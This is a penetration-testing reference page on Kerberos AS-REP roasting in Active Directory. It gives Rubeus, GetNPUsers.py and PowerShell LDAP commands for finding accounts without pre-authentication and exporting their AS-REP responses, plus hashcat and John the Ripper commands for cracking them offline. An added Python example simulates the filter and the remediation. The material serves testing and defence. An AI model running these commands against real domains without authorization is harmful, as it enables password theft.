# Exploitation - Kerberos AS\_REP roasting

### Overview

An AS\_REP roasting attack is an attack on the `Kerberos` authentication protocol that aims at compromising the password of user accounts that do not require `Kerberos` pre-authentication.

The attack is based on the fact that the `KRB_AS_REP` response, returned by the `KDC (Key Distribution Center)` in reply to an initial authentication request `KRB_AS_REQ` sent to the `Authentication Service (AS)`, contains ciphertext encrypted using the client's secret key, which is derived from the account's password.

By default, the `KRB_AS_REQ` must include a timestamp encrypted with the client's secret key, in order to permit the verification of the user's identity before the `KDC` returns a `KRB_AS_REP` response. This verification is omitted for user accounts that do not require `Kerberos` pre-authentication, i.e. accounts with the `DONT_REQ_PREAUTH` flag set in their `userAccountControl` attribute. The secrets of these user accounts are exposed to offline cracking attacks against the returned ciphertext, which are much faster than online guessing and cannot be throttled or locked out.

### Automated DONT\_REQ\_PREAUTH user accounts discovery and export of AS-REP responses

The following tools can be used to automate the discovery of user accounts that do not require `Kerberos` pre-authentication, and the request and export of the corresponding `KRB_AS_REP` responses for offline cracking.

In order to enumerate the domain user accounts, `Rubeus` / `GetNPUsers.py` must be run in a domain-authenticated security context or be provided with valid domain credentials.

```
Rubeus.exe asreproast /outfile:<FILE>
Rubeus.exe asreproast /format:john /outfile:<FILE>

Rubeus.exe asreproast /creduser:'<DOMAIN_FQDN>\<USERNAME>' /credpassword:'<PASSWORD>' /dc:<DC_HOSTNAME | DC_IP> /domain:<DOMAIN_FQDN> /outfile:<FILE_PATH>

# Will attempt to request a TGT for all users.
GetNPUsers.py -request <DOMAIN>/<USERNAME>[:<PASSWORD>]
```

### DONT\_REQ\_PREAUTH user accounts discovery

The following commands can be used to discover user accounts that do not require `Kerberos` pre-authentication (the `4194304` value in the filter is the `DONT_REQ_PREAUTH` bit of the `userAccountControl` attribute):

```
Get-ADUser -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))"
Get-ADUser -Server <DC_HOSTNAME | DC_IP> -Credential <PSCredential> -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))"

Get-NetUser -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))"
Get-NetUser -Server <DC_HOSTNAME | DC_IP> -Credential <PSCredential> -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))"
```
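Added example (not part of the original notes, and not code from any of the tools listed): the LDAP filters above rely on the `1.2.840.113556.1.4.803` matching rule (`LDAP_MATCHING_RULE_BIT_AND`), a bitwise AND against the `userAccountControl` attribute, and `4194304` (`0x400000`) is the `DONT_REQ_PREAUTH` bit. This Python snippet reproduces that filter over a constructed directory export, decodes the flags of each match, separates exposed accounts from disabled ones (which the KDC refuses a TGT in any case) and computes the `userAccountControl` value with the bit cleared. The flag subset and the sample accounts are assumptions made for the example.

```python
# Subset of userAccountControl bit flags (documented Active Directory values).
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
DONT_EXPIRE_PASSWORD = 0x10000
NOT_DELEGATED = 0x100000
DONT_REQ_PREAUTH = 0x400000  # 4194304, the value used in the LDAP filters above

FLAG_NAMES = {
    ACCOUNTDISABLE: "ACCOUNTDISABLE",
    NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    DONT_EXPIRE_PASSWORD: "DONT_EXPIRE_PASSWORD",
    NOT_DELEGATED: "NOT_DELEGATED",
    DONT_REQ_PREAUTH: "DONT_REQ_PREAUTH",
}

LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"

# Constructed directory export (sAMAccountName, userAccountControl); not from a
# real domain.
SAMPLE_USERS = [
    ("alice", NORMAL_ACCOUNT),
    ("svc_backup", NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH),
    ("legacy_app", NORMAL_ACCOUNT | DONT_REQ_PREAUTH),
    ("old_vendor", NORMAL_ACCOUNT | ACCOUNTDISABLE | DONT_REQ_PREAUTH),
]


def ldap_bit_and(value, mask):
    """Semantics of the :1.2.840.113556.1.4.803:= rule: every bit of mask is set."""
    return value & mask == mask


def build_filter(mask=DONT_REQ_PREAUTH):
    """LDAP filter equivalent to the Get-ADUser / Get-NetUser queries above."""
    return ("(&(objectclass=user)(objectcategory=user)"
            f"(useraccountcontrol:{LDAP_MATCHING_RULE_BIT_AND}:={mask}))")


def decode_uac(value):
    """Names of the known flags set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(FLAG_NAMES.items()) if value & bit]


def remediated_uac(value):
    """userAccountControl with DONT_REQ_PREAUTH cleared, i.e. pre-auth required again."""
    return value & ~DONT_REQ_PREAUTH


def triage(users):
    """Apply the filter to an export and tell exposed accounts from disabled ones."""
    rows = []
    for name, uac in users:
        if not ldap_bit_and(uac, DONT_REQ_PREAUTH):
            continue
        disabled = bool(uac & ACCOUNTDISABLE)
        rows.append({
            "sAMAccountName": name,
            "flags": decode_uac(uac),
            # A disabled account is refused a TGT by the KDC, so no AS-REP can be
            # obtained for it; the flag should still be cleared before any re-enable.
            "exposed": not disabled,
            "fixed_uac": remediated_uac(uac),
        })
    return rows


if __name__ == "__main__":
    print(build_filter())
    for row in triage(SAMPLE_USERS):
        state = "EXPOSED" if row["exposed"] else "disabled"
        print(f"{row['sAMAccountName']:<12} {state:<9} "
              f"{'|'.join(row['flags'])} -> set userAccountControl {row['fixed_uac']:#x}")
```

On the Windows side the same clean-up is `Set-ADAccountControl -DoesNotRequirePreAuth $false` on each matched account; where an application genuinely cannot perform pre-authentication, a long random password on that account is what keeps the offline attack impractical.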

### Request and export of KRB\_AS\_REP responses

The following tools can be used to request and export `KRB_AS_REP` responses for user accounts that do not require `Kerberos` pre-authentication.

The following operations do not require knowledge of valid credentials, since the target usernames are supplied directly instead of being enumerated from the domain.

```
Rubeus.exe asreproast /user:<USERNAME> /outfile:<FILE>
Rubeus.exe asreproast /dc:<DC_HOSTNAME | DC_IP> /domain:<DOMAIN_FQDN> /user:<USERNAME> /outfile:<FILE>

GetNPUsers.py '<DOMAIN>/' -usersfile <USERNAMES_FILE>
GetNPUsers.py '<DOMAIN>/' -dc-ip <DC_HOSTNAME | DC_IP> -usersfile <USERNAMES_FILE> -format john
```

### Offline cracking of KRB\_AS\_REP responses

Both `John the Ripper` (magnumripper fork) and `hashcat` can be used to crack the `KRB_AS_REP` responses.

The hash needs to respect the following format to be recognized by `hashcat`:

```
# ENCRYPTION_TYPE 23 = RC4
# ENCRYPTION_TYPE 17 = AES128
# ENCRYPTION_TYPE 18 = AES256

$krb5asrep$<ENCRYPTION_TYPE>$<USERNAME>@<DOMAIN>:$85DA[...]
```

Depending on the tool used to retrieve it, the hash may need to be manually edited to match this format.

The following commands can be used to crack the `KRB_AS_REP` responses:

```
# It is recommended to run hashcat on a Windows OS for better performance, due to driver compatibility.
# Mode 18200 = Kerberos 5 AS-REP, encryption type 23 (RC4-HMAC).
hashcat64.exe -m 18200 -a 0 [-r <RULE_FILE>] '[<HASH> | <HASHFILE>]' <WORDLIST>

john --wordlist=<WORDLIST> <HASHFILE>
```

***

### References

* <https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/>
* <https://tools.ietf.org/html/rfc4120#page-60>
* <https://beta.hackndo.com/kerberos-asrep-roasting/>
* <https://adsecurity.org/?p=227>

